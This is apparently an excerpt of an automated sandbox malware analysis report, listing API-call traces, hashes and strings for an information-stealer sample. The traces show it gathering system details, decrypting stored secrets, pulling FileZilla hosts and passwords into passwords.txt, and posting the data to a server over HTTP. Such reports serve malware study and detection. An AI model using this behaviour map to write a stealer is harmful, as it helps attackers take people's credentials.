                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateBinaryCryptProcessString
                                                                            • String ID:
                                                                            • API String ID: 869800140-0
                                                                            • Opcode ID: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                            • Instruction ID: 533e96b164cb0d967d7948213eb188af149c3bb85dd902e70f95414ccdf186b2
                                                                            • Opcode Fuzzy Hash: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                            • Instruction Fuzzy Hash: C2016931500209FFDF118FA5EC449EBBBAEFF4A350B104429F90193210D7759C91EB60
                                                                            Function 0040FC92 Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                            • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                            • wsprintfA.USER32 ref: 0040FCD7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                            • String ID:
                                                                            • API String ID: 362916592-0
                                                                            • Opcode ID: 8433f4d383a38eb6f244c74d11323a05115bf9a3e49eb4d70838d4eb9b5bf1c5
                                                                            • Instruction ID: 6938abab0ccb62d13e48435ff1e3c4824b48db837a677b598a72c4a0a60eb356
                                                                            • Opcode Fuzzy Hash: 8433f4d383a38eb6f244c74d11323a05115bf9a3e49eb4d70838d4eb9b5bf1c5
                                                                            • Instruction Fuzzy Hash: 28E09271704234FBEB1067A8AC0EF873A6EAB06725F111262FA16D21D0E6B4990487E5
                                                                            Function 004062A5 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                            • LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                            • LocalFree.KERNEL32(?), ref: 004062FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocCryptDataFreeUnprotect
                                                                            • String ID:
                                                                            • API String ID: 2068576380-0
                                                                            • Opcode ID: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                            • Instruction ID: e950b9794f619c2f14945d92c2c82b9cfbc0e84929ee7baf067997c9d55b3a17
                                                                            • Opcode Fuzzy Hash: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                            • Instruction Fuzzy Hash: 38011D7A900218AFDB01EFE8DC849DEBBBDFF48700B10046AFA42E7250D6759950CB50
                                                                            Function 0040FBCB Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocNameProcessUser
                                                                            • String ID:
                                                                            • API String ID: 1206570057-0
                                                                            • Opcode ID: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                            • Instruction ID: 717baa134c2685402ab052e767e48c87ea90d479ce835390d18d57d128390497
                                                                            • Opcode Fuzzy Hash: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                            • Instruction Fuzzy Hash: 90D05EB6700204FBE7109BA5DE0DE9BBBBCEB84755F400166FB02D2290DAF09A05CA34
                                                                            Function 0040FE81 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2452939696-0
                                                                            • Opcode ID: c7e76a4fa3a2ea8111dc81b94c6d332c4cfbbd316f018eaed08d2660ea58f4df
                                                                            • Instruction ID: b1842167c7914b1f8d9f117d359a82b64b5a8af33c7a831c26c3fc120f750992
                                                                            • Opcode Fuzzy Hash: c7e76a4fa3a2ea8111dc81b94c6d332c4cfbbd316f018eaed08d2660ea58f4df
                                                                            • Instruction Fuzzy Hash: A6D067B5D0011DDBCF10EBA4ED89A8977BDAB04608F4045A1AB05F2190E675A61E8BE9
                                                                            Function 004043AD Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 764stringnetworkmemoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 584 4043ad-4044ac _EH_prolog call 40f95a call 403a54 call 410dac call 40fb4d lstrlenA call 40fb4d call 410dac call 40f923 * 5 StrCmpCA 607 4044ae 584->607 608 4044af-4044b4 584->608 607->608 609 4044d4-4045f4 call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40fa28 call 40fa9c call 40f9e1 call 40f98e * 3 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 608->609 610 4044b6-4044ce call 40fb4d InternetOpenA 608->610 615 404cf2-404d2f call 410a94 * 2 call 40fb14 * 4 call 40f95a 609->615 680 4045fa-40462d HttpOpenRequestA 609->680 610->609 610->615 643 404d34-404db7 call 40f98e * 9 615->643 681 404633-404635 680->681 682 404ce9-404cec InternetCloseHandle 680->682 683 404637-404647 InternetSetOptionA 681->683 684 40464d-404c3f call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4020f3 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d lstrlenA GetProcessHeap HeapAlloc call 40fb4d lstrlenA call 40fb4d memcpy call 40fb4d lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d HttpSendRequestA call 410a94 HttpQueryInfoA 681->684 682->615 683->684 889 404c41-404c4e call 40f923 684->889 890 404c53-404c65 call 410a77 684->890 889->643 895 404db8-404dc5 call 40f923 890->895 896 404c6b-404c70 890->896 895->643 898 404cac-404cc1 InternetReadFile 896->898 900 404c72-404c77 898->900 901 404cc3-404cd9 call 40fb4d StrCmpCA 898->901 900->901 902 404c79-404ca7 call 40fa9c call 40f9e1 call 40f98e 900->902 906 404ce2-404ce3 InternetCloseHandle 901->906 907 404cdb-404cdc ExitProcess 901->907 902->898 906->682
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004043B2
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                              • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                              • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                              • Part of subcall function 00410DAC: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                              • Part of subcall function 00410DAC: GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                              • Part of subcall function 00410DAC: RtlAllocateHeap.NTDLL(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • StrCmpCA.SHLWAPI(?,00425987,00425983,0042597B,00425977,00425976), ref: 004044A4
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A40,00000000,?,?,00000000), ref: 00404B42
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00404B54
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00404B6D
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00404B7F
                                                                            • memcpy.MSVCRT ref: 00404B92
                                                                            • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
                                                                            • memcpy.MSVCRT ref: 00404BB3
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00404BC4
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
                                                                            • memcpy.MSVCRT ref: 00404BEA
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
                                                                            • StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
                                                                            • ExitProcess.KERNEL32 ref: 00404CDC
                                                                            • InternetCloseHandle.WININET(?), ref: 00404CEC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$OpenRequestlstrcat$AllocAllocateBinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                            • String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
                                                                            • API String ID: 1779273220-3274521816
                                                                            • Opcode ID: 55ed085d277c474f36801abdb5871a2e9711e2d2595ca9f7e5e1cdb52fd56dac
                                                                            • Instruction ID: 11be5296a5fba78ccfa74642cc821248e7657d66928f859353594ff17aad1918
                                                                            • Opcode Fuzzy Hash: 55ed085d277c474f36801abdb5871a2e9711e2d2595ca9f7e5e1cdb52fd56dac
                                                                            • Instruction Fuzzy Hash: 90624EB190014DEADB11EBE0C956BEEBBB8AF18308F50417EE505735C2DA786B4CCB65
                                                                            Function 0040BBE8 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 370stringmemoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 912 40bbe8-40bca7 _EH_prolog call 40f923 call 410d21 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40f95a call 40618b 935 40c0c4-40c0e8 call 40f98e call 401061 912->935 936 40bcad-40bcbc call 410d6d 912->936 936->935 942 40bcc2-40bd2f strtok_s call 40f923 * 4 GetProcessHeap HeapAlloc 936->942 952 40c00e-40c010 942->952 953 40bd34-40bd42 StrStrA 952->953 954 40c016-40c0bf lstrlenA call 40f923 call 4010b1 call 414437 call 40f98e memset call 40fb14 * 4 call 40f98e * 4 952->954 955 40bd44-40bd72 lstrlenA call 411154 call 40f9e1 call 40f98e 953->955 956 40bd77-40bd85 StrStrA 953->956 954->935 955->956 960 40bdc0-40bdce StrStrA 956->960 961 40bd87-40bdbb lstrlenA call 411154 call 40f9e1 call 40f98e 956->961 964 40bdd0-40be04 lstrlenA call 411154 call 40f9e1 call 40f98e 960->964 965 40be09-40be17 StrStrA 960->965 961->960 964->965 971 40bea2-40beb6 call 40fb4d lstrlenA 965->971 972 40be1d-40be6b lstrlenA call 411154 call 40f9e1 call 40f98e call 40fb4d call 406242 965->972 986 40bffb-40c00c strtok_s 971->986 987 40bebc-40becd call 40fb4d lstrlenA 971->987 972->971 1013 40be6d-40be9d call 40f997 call 40fa9c call 40f9e1 call 40f98e 972->1013 986->952 987->986 999 40bed3-40bee4 call 40fb4d lstrlenA 987->999 999->986 1008 40beea-40befb call 40fb4d lstrlenA 999->1008 1008->986 1017 40bf01-40bff6 lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 3 call 40fb4d lstrcat * 3 call 40fb4d lstrcat * 3 call 40f997 * 4 1008->1017 1013->971 1017->986
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040BBED
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                              • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                            • strtok_s.MSVCRT ref: 0040BCCB
                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00425C43,00425C42,00425C3F,00425C3E), ref: 0040BD1F
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040BD26
                                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BD3A
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BD45
                                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BD7D
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BD88
                                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 0040BDC6
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BDD1
                                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BE0F
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BE1E
                                                                            • lstrlenA.KERNEL32(?), ref: 0040C019
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            • memset.MSVCRT ref: 0040C06C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                            • API String ID: 486015307-935134978
                                                                            • Opcode ID: f2f8cbe532bdc0e02a5018567e52a03efa155cd81b80a91211cbc27a9844cae7
                                                                            • Instruction ID: 75576aa526d99454559884b64ef79bc970659b381021a5103b73b201e8ee831e
                                                                            • Opcode Fuzzy Hash: f2f8cbe532bdc0e02a5018567e52a03efa155cd81b80a91211cbc27a9844cae7
                                                                            • Instruction Fuzzy Hash: 3AE16C71900258EADB15EBE1DC56FEEBB78AF19304F50047AF505B21D2EF781A08CB69
                                                                            Function 0040E7B8 Relevance: 63.4, APIs: 22, Strings: 14, Instructions: 411registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
